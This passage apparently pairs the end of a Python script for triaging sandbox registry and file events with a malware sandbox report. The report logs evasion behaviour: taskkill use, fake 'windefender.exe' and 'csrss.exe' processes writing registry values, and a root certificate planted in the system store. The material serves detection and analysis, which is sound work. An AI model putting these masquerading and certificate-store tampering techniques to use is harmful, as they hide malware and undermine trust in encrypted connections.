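ROW_RE = re.compile(
    r"^(?P<desc>Set value \((?:int|str|data)\)|Key \w+|File created|"
    r"File opened(?: for modification| \(read-only\))|N/A) "
    r"(?P<ind>.+?) (?P<proc>C:\\.+?|N/A) (?P<target>N/A|C:\\.+)$"
)
DEFENDER_RE = re.compile(
    r"^\\REGISTRY\\MACHINE\\SOFTWARE\\(?:Policies\\)?Microsoft\\Windows Defender\\"
    r"Exclusions\\(?P<kind>Paths|Processes|Extensions)\\(?P<name>.+)$", re.IGNORECASE)
RUN_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\(?P<name>[^\\]+)$", re.IGNORECASE)
SERVICE_RE = re.compile(r"\\services\\[^\\]+\\", re.IGNORECASE)

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM_NAMES = {"csrss.exe", "smss.exe", "wininit.exe", "winlogon.exe", "services.exe",
                "lsass.exe", "svchost.exe", "conhost.exe", "dwm.exe", "taskhost.exe"}
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def parse_row(row):
    m = ROW_RE.match(row)
    if not m:
        raise ValueError("unparsed row: " + row)
    return m.groupdict()


def decode_value(raw):
    # Quoted data is written with C-style escapes (backslash-quote,
    # backslash-backslash), which json.loads undoes; unquoted data (hex dumps
    # of binary values) is returned untouched.
    return json.loads(raw) if raw.startswith('"') else raw


def basename(path):
    return path.lower().strip('"').rsplit("\\", 1)[-1]


def masquerades(path):
    """A core Windows process name living outside System32/SysWOW64."""
    p = path.lower().strip('"')
    return basename(p) in SYSTEM_NAMES and not p.startswith(SYSTEM_DIRS)


def triage(rows):
    """One finding per row that deserves an analyst's attention; the rest is dropped."""
    findings = []
    for r in map(parse_row, rows):
        desc, ind, proc = r["desc"], r["ind"], r["proc"]
        if desc.startswith("Set value"):
            key, _, raw = ind.partition(" = ")
            excl, run = DEFENDER_RE.match(key), RUN_RE.search(key)
            if excl:
                name, why = excl["name"], []
                if basename(name) == basename(proc):
                    why.append("excludes the writing process itself")
                if basename(name) in SYSTEM_NAMES:
                    why.append("core Windows process name")
                if name.lower().startswith(USER_WRITABLE):
                    why.append("user-writable location")
                findings.append({"kind": "defender-exclusion", "severity": "high" if why else "medium",
                                 "detail": f"{excl['kind']}: {name} ({'; '.join(why) or 'review'})",
                                 "process": proc})
            elif run:
                cmd = decode_value(raw).strip('"')
                findings.append({"kind": "run-key", "severity": "high" if masquerades(cmd) else "medium",
                                 "detail": f"{run['name']} -> {cmd}", "process": proc})
        elif desc == "Key deleted" and SERVICE_RE.search(ind):
            findings.append({"kind": "service-config-deleted", "severity": "high",
                             "detail": ind, "process": proc})
        elif desc == "File created":
            low = ind.lower()
            if masquerades(ind):
                why = "core process name outside System32"
            elif low.endswith(".sys"):
                why = "kernel driver dropped"
            elif low.endswith("\\drivers\\etc\\hosts"):
                why = "hosts file rewritten"
            else:
                continue
            findings.append({"kind": "file-drop", "severity": "high",
                             "detail": f"{ind} ({why})", "process": proc})
    return findings


if __name__ == "__main__":
    for f in triage(ROWS):
        print(f"[{f['severity']:6}] {f['kind']:24} {f['detail']}  <- {f['process']}")
```

The self-exclusion check (the value name equals the writing process's own file name) is the cheapest high-confidence rule here: a legitimate installer excludes a product directory, not the binary that is doing the excluding. The DWORD data of an exclusion value is 0 for every entry, so the presence of the value name, not its data, is the exclusion.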

Enumerates physical storage devices

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe | N/A

Detects videocard installed

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\rss\csrss.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-551 = "North Asia Daylight Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" | C:\Windows\system32\netsh.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" | C:\Windows\system32\netsh.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" | C:\Windows\windefender.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe | N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee
38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc
6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4e
a879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d